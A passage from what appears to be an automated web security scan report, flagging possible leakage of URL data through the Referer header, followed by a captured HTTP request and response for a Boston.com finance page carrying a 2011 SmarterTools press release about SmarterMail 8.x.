You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /boston/news/read?GUID=17744398 HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; ssbusi=1; RMFD=011PrVUgO105wRm|O205ya3|O105yhs; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 22:44:46 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 16 Mar 2011 22:44:46 GMT
Age: 1
X-Cache: HIT from squid2.sv1.financialcontent.com
X-Cache-Lookup: HIT from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 35383

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>SmarterTools Introduces SmarterMail 8.x: Where the Little Things Make All the Difference | Stock Market Summary (NSDQ, NYSE, AMEX and more) on Boston.com </title>
<meta name="robots" content="noarchive" />
<meta http-equiv="Keywords" content="stock market summary, stock information, nsdq, nyse, amex" />
<meta http-equiv="Description" content="Find the latest stock activity of the day with our stock market summary on Boston.com" />
<meta http-equiv="charset" content="iso-8859-1">
<link rel="search" type="application/opensearchdescription+xml" title="Boston.com Local Search" href="http://cache.boston.com/search/files/bostonsearch.xml" />
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles.css" type="text/css" />
<!--[if IE]><link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles_ie.css" type="text/css" /><![endif]-->
<script language="JavaScript" type="text/javascript" src="http://cache.boston.com/universal/js/bcom_global_scripts.js"></script>
<script language="javascript" type="text/javascript" src="http://cache.boston.com/universal/js/jquery-1.3.2.min.js"></script>
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_section_styles.css" type="text/css" />
<script>ifSafari();</script>
<!--Weather Query Params--><script language="JavaScript1.1" type="text/javascript" src="http://cache.boston.com/weather-ad-include.js"></script>
<!--Begin OAS MJX setup tag--><script language="JavaScript"><!--
//configuration
var site=document.URL.toLowerCase().match(/s_campaign=(\w+)/);
if (!(site))
{campaign="0000"}
else
{campaign=site[1]};
var siteMarket=document.URL.split('/');
if (siteMarket[3] == 'boston?Page=MarketSummary')
OAS_sitepage='www.boston.com/business/markets/homepage'
else
OAS_sitepage='www.boston.com/business/markets';
OAS_listpos='TOP,INTRO,BOTTOM,POPUP,POPUN,EXTRA,BILLBOARD,SPONSOR1,SPONSOR2,SPONSOR3,SPONSOR4,SPONSOR5,SPONSOR6,CENTRAL';
oasquery='pagetype=generic_page&RM_Exclude=exclude_generic_page&s_campaign='+campaign;if(typeof OAS_query=='undefined'||!OAS_query)OAS_query=oasquery;else OAS_query+='&'+oasquery;
OAS_url='http://rmedia.boston.com/RealMedia/ads/';OAS_target='_top';OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';OAS_rn=new String(Math.random());OAS_rns=OAS_rn.substring(2, 11);
//--></script><script language="JavaScript1.2"><!--
var rerefer=/referrer=(\w+)/,urefer=document.URL.match(rerefer);if(urefer){if(OAS_query){var reexclude=/RM_Exclude=[\w,*]+/,OAS_query=OAS_query.replace(reexclude,OAS_query.match(reexclude)[0]+',exclude_referrer_'+urefer[1].toLowerCase());OAS_query+='&';}OAS_query+=urefer[0];}
//--></script><script language="JavaScript"><!--
function OAS_NORMAL(pos){document.writeln('<A HREF="'+OAS_url+'click_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+ pos+'?'+OAS_query+'" TARGET='+OAS_target+'>');document.writeln('<IMG SRC="'+OAS_url+'adstream_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+pos+'?'+OAS_query+'" BORDER=0></A>');}
//--></script><script language="JavaScript1.1"><!--
OAS_version=11;if((navigator.userAgent.indexOf('Mozilla/3')!=-1)||navigator.userAgent.indexOf('Mozilla/4.0 WebTV')!=-1){OAS_version=10;}if(OAS_version >= 11)document.writeln('<SCR'+'IPT LANGUAGE=JavaScript1.1 SRC="'+OAS_url+'adstream_mjx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'?'+OAS_query+'"> <\/SCRIPT>');
//--></script><script language="JavaScript"><!--
document.writeln('');
function OAS_AD(pos){if(OAS_version >= 11)OAS_RICH(pos);else OAS_NORMAL(pos);}
//--></script><!--End OAS MJX setup tag-->
<script language="JavaScript"><!--
var var5 = 'business_';
//--></script>
<style>
<!--
#globalNavRedux #nav li#gbusiness {background-color:#3F5F9C; background-image:url(http://cache.boston.com/universal/site_graphics/nav_main_on.gif);}
#globalNavRedux #nav li#gbusiness a {color:#fff;}
//--></style>
<style>
<!--
#globalNavRedux #sNav a#secnav_markets, a#secnav_markets:link, a#secnav_markets:visited, a#secnav_markets:active, a#secnav_markets:hover { font-weight: bold; text-decoration: none; color: #000; }
//--></style>
</head>
<body onload="windowLoaded();displayEmbed();">
<div id="container">

<div id="containerBorder">
<div id="header">
<div id="headL">
    <div id="mastHead">
    <a href="http://www.boston.com" class="imageLink"><img src="http://cache.boston.com/universal/site_graphics/bcom_small.gif"></a>
<div id="searchForm">
<div><span onclick="choose(this);" id="searchLocal" class="searchOn">Local Search</span> <span onclick="choose(this)" id="searchSite">Site Search</span></div>
<script>otherTab = document.getElementById('searchLocal');</script>
<form action="http://search.boston.com/local/Search.do" onsubmit="searchSubmit();">
<input type="text" name="s.sm.query" id="textField"><input type="submit" value="GO" class="form-button" />
<input type="hidden" id="tab" name="s.tab" value="" />
</form>
</div>
    </div>
    </div>
<div id="headR">
<div id="signIn">
<span id="login" class="utility"><script language="JavaScript"><!--
try{showLoginRRD(147);}catch(e){document.writeln('&nbsp;');}
//--></script><noscript>&nbsp;</noscript></span>
<span id="globeLogo"><span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&amp;od=28">Home Delivery</a></span><a href="http://www.boston.com/bostonglobe/"><img src="http://cache.boston.com/universal/site_graphics/glogo.jpg" /></a></span>
</div>
<div id="headAd">
<div align="center" cellpadding="0"
cellspacing="0" border="0"><div
class="bannerAd" align="center"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('TOP');
//--></script><!--End Ad Tag--></div></div>
</div>
</div>
</div>
<div id="globalNavRedux">
<ul class="gnavContainer" id="nav"><li id="ghome"><a
href="http://www.boston.com/">Home</a></li><li
id="gglobe"><a href="http://www.boston.com/bostonglobe">Today's Globe</a></li><li
id="gnews"><a href="http://www.boston.com/news/">News</a></li><li
id="gbusiness"><a href="http://www.boston.com/business/">Business</a></li><li
id="gsports"><a href="http://www.boston.com/sports/">Sports</a></li><li
id="glifestyle"><a href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li
id="gae"><a href="http://www.boston.com/ae/">A&amp;E</a></li><li
id="gthings"><a href="http://www.boston.com/thingstodo/">Things to do</a></li><li
id="gtravel"><a href="http://www.boston.com/travel/">Travel</a></li><li
id="gcars"><a href="http://www.boston.com/cars/">Cars</a></li><li
id="gjobs"><a href="http://www.boston.com/jobs/">Jobs</a></li><li
id="gre"><a href="http://www.boston.com/realestate/">Homes</a></li><li
id="gsearch"><a href="http://search.boston.com/">Local Search</a></li></ul>

<ul id="sNav"><li><a href="http://www.boston.com/business/technology/"
id="secnav_technology">Technology</a></li><li><a
href="http://www.boston.com/business/healthcare/"
id="secnav_healthcare">Healthcare</a></li><li><a
href="http://finance.boston.com/boston?Page=MarketSummary"
id="secnav_markets">Markets</a></li><li><a
href="http://www.boston.com/business/personalfinance/"
id="secnav_personalfinance">Personal finance</a></li><li><a
href="http://www.boston.com/business/columnists/"
id="secnav_columnists">Columnists</a></li></ul>

</div>
<div id="introad" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('INTRO');
//--></script><!--End Ad Tag--></div>
<div id="billboardAd" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('BILLBOARD');
//--></script><!--End Ad Tag--></div>



<div class="hideMe"><!--
<headline>More financial news</headline>
<source>Boston.com</source>
<teasetext>Check out the More financial news Page on Boston.com. </teasetext>
<byline></byline>
<date>August 24, 2009</date>
--></div>


<div id="content" class="section section95">
<div id="Col1">


<style type="text/css">@import url(http://finance.boston.com/client/boston/privatelabel.css);</style><style type="text/css">@import url(http://finance.boston.com/client/boston/boston/privatelabel.css);</style><div class="span invc">

<script src="http://js.financialcontent.com/FCON/FCON.js" type="text/javascript"></script>
<script type="text/javascript">
FCON.initialize('http://js.financialcontent.com/',false,'finance.boston.com','boston','');
</script>

<style type="text/css">@import url(http://finance.boston.com/privatelabel/privatelabel1.css);</style>
<script type="text/javascript">
document.FCON.setAutoReload(1800);
</script>

<div class="span nav">
<div class="investingnav1">
<div class="menu clearfix" hoverable="true">
<div class="item active" hoverable="true"><a href="http://finance.boston.com/boston/markets?">Markets</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/quote?Symbol=%24MASS">MA Stock Indexes</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/stocks?">Stocks</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/funds?">Mutual Funds &amp; ETF&#39;s</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/sectors?">Sectors</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/rates?">Rates</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/user/login?">Tools</a></div>
</div>
<div class="items clearfix">
<div class="item "><a href="http://finance.boston.com/boston/markets?">Overview</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/news?">Market News</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/video?">Market Videos</a></div>
<div class="item "><a href="http://finance.boston.com/boston/currencies?">Currencies</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/international?">International</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/treasury?">Treasury &amp; Bonds</a></div>
</div>

<div class="getquote clearfix">
<div class="clearfix">
<div class="tickerbox" id="investingnav_tickerbox"></div>
<a class="investingnav_search" href="http://finance.boston.com/boston/search?">Search InvestCenter</a>
</div>
<div class="hotlinks clearfix">
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/recentquotes?">Recent Quotes</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/recentquotes?">View Full List</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/watchlist?">My Watchlist</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/watchlist?">Create Watchlist</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next">Top Indices</a>
<div class="drop_items" style="display:none">
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=310%3A998313">Dow Jones Industrial Average</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=67%3A998356">NASDAQ Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=845%3A998434">Standard &amp; Poors 500</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A1540753">NYSE COMPOSITE INDX</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A568249">Amex Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=771%3A998819">Russell 2000</a></div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
document.FCON.loadLibrary('Hover');
document.FCON.loadLibraryImmediately('QuoteAPI');
document.FCON.loadLibraryImmediatelyCallback('TickerBox',
function () {
document.FCON.TickerBox.create(document.getElementById("investingnav_tickerbox"));
}
);
</script>
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/nav/investingnav1.css);</style>

</div>

<div class="span page">
<div class="widget">
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/news/newsread1.css);</style><div class="newsread clearfix">
<div class="title" id="newsItemTitle">SmarterTools Introduces SmarterMail 8.x: Where the Little Things Make All the Difference</div>
<div class="titleattributes clearfix">
<div class="pubdate"><div class="span date">Tuesday March 15, 2011 - 06:15 AM EDT</div></div>
<div class="channel"><a href="http://finance.boston.com/boston/news/channelinfo?ChannelID=3191">Business Wire News Releases</a></div>
<div class="releasedBy">Released By <a href="http://finance.boston.com/boston/news/releasedby?ReleasedBy=SmarterTools+Inc.">SmarterTools Inc.</a></div>
</div>



<div class="floatright">

<div class="fcadunit">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=2153");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>

<div class="sidebar clearfix">

<div class="companylogo"><img src="http://rss.financialcontent.com/images/feed/150px/2/72/272846.img" /></div>




<div class="share">
<div class="span label">Share:</div>
<!-- AddThis Button BEGIN -->
<script type="text/javascript">var addthis_pub="mdierolf";</script>
<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
<!-- AddThis Button END -->
</div>
<script type="text/javascript">
zoomLevel = 100;
</script>
<!--DOCUMENT NEWSENGINE TOOLS-->
<div class="mediatools">
<div class="mediatool" style="display:none">
<div class="label">Text Size:</div>
<div class="icon_txt_enlarge"><a href="#" onclick="zoomLevel += 10; document.getElementById('mediaZoom').style.fontSize = zoomLevel + '%'; return false">&nbsp;</a></div>
<div class="icon_txt_shrink"><a href="#" onclick="zoomLevel -= 10; document.getElementById('mediaZoom').style.fontSize = zoomLevel + '%'; return false">&nbsp;</a></div>
</div>




</div>
</div>

</div>




<div class="body" id="news_body">
<div id="mediaZoom">
<span xmlns="http://www.w3.org/1999/xhtml"><span><span/></span><span><p>
SmarterTools Inc. is proud to announce the release of SmarterMail 8.x, <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=a+Microsoft+Exchange+alternative&amp;index=1&amp;md5=7d76eda161427115af85fc945239bff9" popable="true" rel="nofollow">a
Microsoft Exchange alternative</a> for any business. The latest release
of their popular <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=mail+server+software&amp;index=2&amp;md5=b564c275a54066759223e738b508bd55" popable="true" rel="nofollow">mail
server software</a> focuses on enhancing the user experience with
touch-and-go functionality, improved contact sharing, enhanced signature
options, new message notifications, password strength enforcement for
administrators and much more.
</p><p>
...The last few releases of the SmarterMail have centered on enhancing the
user experience,... said Tim Uzzanti, CEO of SmarterTools. ...With
SmarterMail 7.x we redesigned and simplified our webmail interface,
introduced the synchronization center and file storage, and improved
mailbox searching. With SmarterMail 8.x, we...ve continued to fine-tune
and simplify the user experience while adding even more functionality to
our award-winning mail server....
</p><p>
New features and enhancements in SmarterMail 8.x include:
</p><ul><li><b>Touch-and-go functionality</b> ... Emailing a contact, mapping an
address or adding an email address to your contacts list has never
been easier. SmarterMail 8.x introduces clickable addresses, phone
numbers and email addresses for click-to-map, click-to-call and
click-to-mail functionality in messages, contact details, calendar
items, tasks and notes.
</li><li><b>Improved contact sharing</b> ... Users can now download, save or send
contact details in .CSV or vCard format, making it easy to share the
email address or phone number of a friend or colleague in their
SmarterMail address book.
</li><li><b>New message notifications</b> ... Now users receive a notification
that they...ve received a new message no matter which section of the
interface they are viewing.
</li><li><b>Built-in filters for viewing messages</b> ... View read messages,
unread messages, replied to messages, forwarded messages or all
messages with attachments with the click of the mouse.
</li><li><b>Synchronization Center Translation </b>... The synchronization center
now detects the browser language and automatically translates the sync
info into that language, making it easier to provide info about
available sync protocols to international users.
</li><li><b>Password retrieval and compliancy options</b> ... When enabled, users
that can...t remember their password will receive an email to their
backup email address with instructions on resetting their password.
Plus, system administrators can use the new password compliance report
to identify users that don...t meet the specified password requirements
and send them a request to change their passwords.
</li><li><b>Improved performance </b>... Numerous optimizations to SmarterMail
8.x reduce disk I/O by an average of 25%. This includes better grid
controls, improved charting and an update to the Microsoft .NET 4.0
Framework.
</li><li><b>Improved administration </b>... With better spool management,
enhancements to IP binding settings, hard limit throttling and support
for SPF RR lookups, mail server administration is easier and more
convenient. Plus, system administrators have access to even more Web
services.
</li></ul><p>
SmarterMail is available at the SmarterTools website and through <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fpartners%2Fpartner-programs.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=authorized+resellers&amp;index=3&amp;md5=eecda7962c7be742b82516312b289374" popable="true" rel="nofollow">authorized
resellers</a>. A complete list of new features and improvements is
available by viewing the <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Freleasenotes%2Fv8.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=SmarterMail+8.x+release+notes&amp;index=4&amp;md5=c659640f16082fef51f6291b3a607ccb" popable="true" rel="nofollow">SmarterMail
8.x release notes</a>.
</p><p>
Follow us on Twitter: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Ftwitter.com%2Fsmartertools&amp;esheet=6647089&amp;lan=en-US&amp;anchor=%40smartertools&amp;index=5&amp;md5=c9f7577c4e2744f5a5eb2eced46ec764" popable="true" rel="nofollow">@smartertools</a></p><p>
Watch our videos on YouTube: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.youtube.com%2Fsmartertools&amp;esheet=6647089&amp;lan=en-US&amp;anchor=http%3A%2F%2Fwww.youtube.com%2Fsmartertools&amp;index=6&amp;md5=49ce4902c30a8a3499da6a058636f483" popable="true" rel="nofollow">http://www.youtube.com/smartertools</a></p><p>
Read our blog: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fblog.smartertools.com&amp;esheet=6647089&amp;lan=en-US&amp;anchor=http%3A%2F%2Fblog.smartertools.com&amp;index=7&amp;md5=f09b9ee5597016741dc2a3d48b77903a" popable="true" rel="nofollow">http://blog.smartertools.com</a></p><p>
About SmarterTools Inc.
</p><p>
Founded in 2003, SmarterTools Inc. is an information technology
management software company based in Phoenix, Arizona. SmarterTools
develops a <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=Windows+mail+server&amp;index=8&amp;md5=753dfcf21359acd124f726ecf17ba3d3" popable="true" rel="nofollow">Windows
mail server</a>, <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartertrack%2Fhelp-desk-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=customer+service+software&amp;index=9&amp;md5=3858e9ddaccf462e4a8dea61fcdcfbb6" popable="true" rel="nofollow">customer
service software</a>, and <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmarterstats%2Fweb-analytics-seo-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=Web+log+analytics+and+SEO+software&amp;index=10&amp;md5=ee1830947b29223ebfa4d4bd225e4e56" popable="true" rel="nofollow">Web
log analytics and SEO software</a> that help companies communicate,
measure, and support their worldwide business operations. Additional
information about SmarterTools Inc. and the SmarterTools product line is
available at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com&amp;esheet=6647089&amp;lan=en-US&amp;anchor=www.smartertools.com&amp;index=11&amp;md5=45670fe0032c618fc71f4715ff97e2fc" popable="true" rel="nofollow">www.smartertools.com</a>.
</p><p>
Microsoft Exchange and Windows are trademarks of Microsoft Corporation [<a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.marketwatch.com%2Fquotes%2Fmsft&amp;esheet=6647089&amp;lan=en-US&amp;anchor=MSFT&amp;index=12&amp;md5=ca906155f80a16d742609363657b0485" popable="true" rel="nofollow">MSFT</a>].
</p><p><img alt="" src="http://cts.businesswire.com/ct/CT?id=bwnews&amp;sty=20110315005734r1&amp;sid=6434&amp;distro=ftp"/><span/></p></span></span> </div>
</div>
<script type="text/javascript">
function scanBody () {
document.FCON.loadLibraryCallback('HoverQuote', function() {
document.FCON.HoverQuote.scanTags(document.getElementById('news_body'));
});
}
setTimeout("scanBody()",50);
</script>

<div class="data contacts">
Contacts: <br /><br />
<fc:contacts xmlns="http://www.w3.org/1999/xhtml"><b>SmarterTools</b><br/>Derek Curtis<b>, </b>VP of Marketing,
623-434-8050<br/><a href="mailto:dcurtis@smartertools.com">dcurtis@smartertools.com</a></fc:contacts>
</div>


<div class="mediatool icon_print"><a href="#" onclick="window.print(); return false;">Print this story</a></div>
<div class="mediatool icon_email"><a href="#" onclick="emailAFriend(document.getElementById('newsItemTitle'),location.href,document.getElementById('newsItemTitle').innerHTML); return false;" >Email this story</a></div>
<div class="mediatool icon_pdf"><a href="http://finance.boston.com/boston/action/getnewspdf?GUID=17744398">Download PDF</a></div>
</div>



</div>

</div>

<div style="padding:0 10px 10px 10px">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1837");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
<div class="attribution">
<a href="http://www.financialcontent.com" style="font-weight:bold">Stock Market XML and JSON Data API</a> provided by FinancialContent Services, Inc.<br />
Nasdaq quotes delayed at least 15 minutes, all others at least 20 minutes. <br />
By accessing this page, you agree to the following
<a href="http://www.financialcontent.com/tos.html" target="_blank" >terms and conditions</a>.<br />
<a href="http://rates.banks.com/mortgage-rates/" target="_blank" >Mortgage Rates</a>, <a href="http://rates.banks.com/cd-rates/" target="_blank" >CD Rates</a> &amp;
<a href="http://rates.banks.com/home-equity-rates/" target="_blank" >Home Equity Rates</a> provided by <a href="http://www.banks.com/" target="_blank" >Banks.com</a>
<br />
<a href="http://www.prconnect.com/" target="_blank" >Press Release Service</a> provided by PRConnect.
<br />
Fundamental data supplied by Morningstar<br />
Stock quotes supplied by Telekurs USA<br />
<a style="display:none" href="http://www.financialcontent.com/honeypot/">Bots go here</a>
</div>

<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/attribution/attribution1.css);</style>

<script>
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.boston.com%2Fboston%2Fnews%2Fread%3FHTTP_HOST%3Dfinance.boston.com%26HTTPS%3Doff%26GUID%3D17744398&Type=page&Client=boston&rand=' + Math.random();
head.appendChild(script);
</script>

<script>
_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);
</script>
<script langugage="JavaScript">var tcdacmd="dt";</script> <script
src="http://an.tacoda.net/an/18181/slf.js" language="JavaScript"></script>
</div>



</div>
<div id="Col2">
<div id="railTop"></div>
<div class="fixedAds"><div><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('CENTRAL');
//--></script><!--End Ad Tag--></div></div>
</div>
<div id="Col3"></div>
<div class="cf"></div>
</div>

<div id="footer">
<div id="bottomBanner">
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR1');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR2');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR3');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR4');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR5');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR6');
//--></script><!--End Ad Tag--></div>
<div class="cf"></div>
</div>
<div>
<div id="bottomLinks">
<ul class="gnavContainer">
<li><a rel="nofollow" href="http://www.boston.com/">Home</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/globe/">Today's Globe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/">News</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/business/">Business</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/sports/">Sports</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/ae/">A&amp;E</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/thingstodo/">Things to Do</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/travel/">Travel</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/cars/" class="cfied">Cars</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/jobs/" class="cfied">Jobs</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/realestate/" class="cfied">Homes</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/search/" class="cfied">Local Search</a></li>
</ul>
<ul id="bcomLinks">
<li class="first"><a rel="nofollow" href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a></li> <li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/">Help</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a></li><li class="listPipe">|</li>
<li><a href="http://boston.monster.com/search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1">Work here</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/privacy_policy/">Privacy Policy</a></li><li class="listPipe">|</li>
<li><script language="JavaScript"><!--
signupLink();
